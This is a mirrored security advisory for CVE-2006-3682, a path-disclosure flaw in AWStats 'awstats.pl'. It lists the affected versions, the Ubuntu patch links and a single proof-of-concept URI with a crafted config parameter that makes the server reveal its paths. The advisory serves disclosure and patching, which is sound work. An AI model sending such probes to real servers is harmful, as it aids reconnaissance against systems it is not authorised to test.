No account yet?
Home » Exploits » AWStats 'awstats.pl' Multiple Path Disclosure Vulnerability
AWStats 'awstats.pl' Multiple Path Disclosure Vulnerability E-mail
Feeds - Exploits
Written by r0t   
Wednesday, 18 March 2009 22:02
AWStats 'awstats.pl' Multiple Path Disclosure Vulnerability


-\\Bugtraq ID:
34159

-\\Class:
Design Error

-\\CVE:
CVE-2006-3682


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Apr 19 2006 12:00AM

-\\Updated:
Mar 18 2009 05:56PM

-\\Credit:
r0t is credited with the discovery of this vulnerability.



-\\Vulnerable:
WebGUI WebGUI Runtime Environment 0.8.5
Ubuntu Ubuntu Linux 5.10 sparc
Ubuntu Ubuntu Linux 5.10  powerpc
Ubuntu Ubuntu Linux 5.10  i386
Ubuntu Ubuntu Linux 5.10  amd64
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux  6.06 LTS sparc
Ubuntu Ubuntu Linux  6.06 LTS powerpc
Ubuntu Ubuntu Linux  6.06 LTS i386
Ubuntu Ubuntu Linux  6.06 LTS amd64
AWStats AWStats 6.5 build 1.857
AWStats AWStats 6.4
AWStats AWStats 6.3
AWStats AWStats 6.2
AWStats AWStats 6.1
AWStats AWStats 6.0
AWStats AWStats 5.9
AWStats AWStats 5.8
AWStats AWStats 5.7
AWStats AWStats 5.6
AWStats AWStats 5.5
AWStats AWStats 5.4
AWStats AWStats 5.3
AWStats AWStats 5.2
AWStats AWStats 5.1
AWStats AWStats 5.0
AWStats AWStats 4.0
+ Debian Linux 3.0  sparc
+ Debian Linux 3.0  s/390
+ Debian Linux 3.0  ppc
+ Debian Linux 3.0  mipsel
+ Debian Linux 3.0  mips
+ Debian Linux 3.0  m68k
+ Debian Linux 3.0  ia-64
+ Debian Linux 3.0  ia-32
+ Debian Linux 3.0  hppa
+ Debian Linux 3.0  arm
+ Debian Linux 3.0  alpha
+ Debian Linux 3.0



-\\Not Vulnerable:
WebGUI WebGUI Runtime Environment  0.9



-\\Discussion
AWStats is prone to a path-disclosure vulnerability.

Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further
attacks against a vulnerable computer.

The following are vulnerable:

AWStats 6.5 (build 1.857) and prior
WebGUI Runtime Environment 0.8.x and prior



-\\Exploit(s)/PoC(s):
Attackers can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/awstats/awstats.pl?config=HACKdestailleur.fr



-\\Solution
Updates are available. Please see the references for more information.


AWStats AWStats 6.3
--Ubuntu  awstats_6.3-1ubuntu0.4_all.deb
Ubuntu 5.04:
http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.3-1ubuntu0.4_all.dehttp://security.ubuntu.com/
ubuntu/pool/main/a/awstats/awstats_6.3-1ubuntu0.4_all.deb

AWStats AWStats 6.4
--Ubuntu  awstats_6.4-1ubuntu1.3_all.deb
Ubuntu 5.10:
http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.4-1ubuntu1.3_all.dehttp://security.ubuntu.com/
ubuntu/pool/main/a/awstats/awstats_6.4-1ubuntu1.3_all.deb



-\\Reference(s)
--AWStats Homepage
http://awstats.sourceforge.net  (AWStats)
--Security issue - Awstats.pl reveals server info on error  (#8964)
http://www.plainblack.com/bugs/tracker/896  (WebGUI)
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff